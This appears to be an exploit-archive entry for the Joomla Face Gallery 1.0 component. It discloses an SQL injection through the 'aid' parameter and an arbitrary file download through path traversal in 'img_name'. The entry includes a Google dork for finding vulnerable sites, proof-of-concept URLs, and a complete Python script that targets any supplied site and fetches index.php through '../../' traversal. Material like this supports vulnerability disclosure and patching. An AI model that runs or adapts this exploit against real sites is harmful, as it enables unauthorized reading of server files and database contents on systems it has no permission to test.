Joomla Face Gallery 1.0 - Multiple vulnerabilities

2014-09-24 21:05:06

######################

# Exploit Title : Joomla Face Gallery 1.0 Multiple Vulnerabilities

# Exploit Author : Claudio Viviani

# Vendor Homepage : https://www.apptha.com

# Software Link : https://www.apptha.com/downloadable/download/sample/sample_id/150

# Dork Google: inurl:option=com_facegallery

# Date : 2014-09-17

# Tested on : Windows 7 / Mozilla Firefox
# Linux / Mozilla Firefox

# Info:

# Joomla Face Gallery 1.0 suffers from SQL injection and Arbitrary file dowwnload vulnerabilities

# PoC Exploit:
#
# http://localhost/index.php?option=com_facegallery&view=images&aid=[SQLi]&lang=en
# http://localhost/index.php?option=com_facegallery&task=imageDownload&img_name=[../../filename]

# "aid" and img_name variables are not sanitized.

######################

# Arbitrary file download exploit:

#!/usr/bin/env python

# http connection
import urllib, urllib2
# Args management
import optparse
# Error managemen
import sys

banner = """
__ __ _______
|__.-----.-----.--------| .---.-. | _ .---.-.----.-----.
| | _ | _ | | | _ | |. 1___| _ | __| -__|
| |_____|_____|__|__|__|__|___._| |. __) |___._|____|_____|
|___| |: |
|::.|
`---'
_______ __ __ _____ _______
| _ .---.-| | .-----.----.--.--. | _ | | _ |
|. |___| _ | | | -__| _| | | |.| |__|. | |
|. | |___._|__|__|_____|__| |___ | `-|. |__|. | |
|: 1 | |_____| |: | |: 1 |
|::.. . | |::.| |::.. . |
`-------' `---' `-------'

j00ml4 F4c3 G4ll3ry 4rb1tr4ry F1l3 D0wnl04d

Written by:

Claudio Viviani

http://www.homelab.it

[email protected]
[email protected]

https://www.facebook.com/homelabit
https://twitter.com/homelabit
https://plus.google.com/+HomelabIt1/
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
"""

# Check url
def checkurl(url):
if url[:8] != "https://" and url[:7] != "http://":
print('[X] You must insert http:// or https:// procotol')
sys.exit(1)
else:
return url

def connection(url,pathtrav):
try:
response = urllib2.urlopen(url+'/index.php?option=com_facegallery&task=imageDownload&img_name='+pathtrav+'index.php')
content = response.read()
if content != "":
print '[!] VULNERABLE'
print '[+] '+url+'/index.php?option=com_facegallery&task=imageDownload&img_name='+pathtrav+'index.php'
else:
print '[X] Not Vulnerable'
except urllib2.HTTPError:
print '[X] HTTP Error'
except urllib2.URLError:
print '[X] Connection Error'

commandList = optparse.OptionParser('usage: %prog -t URL')
commandList.add_option('-t', '--target', action="store",
help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",
)
options, remainder = commandList.parse_args()

# Check args
if not options.target:
print(banner)
commandList.print_help()
sys.exit(1)

print(banner)

url = checkurl(options.target)
pathtrav = "../../"

connection(url,pathtrav)

Fixes

No fixes

In order to submit a new fix you need to be registered.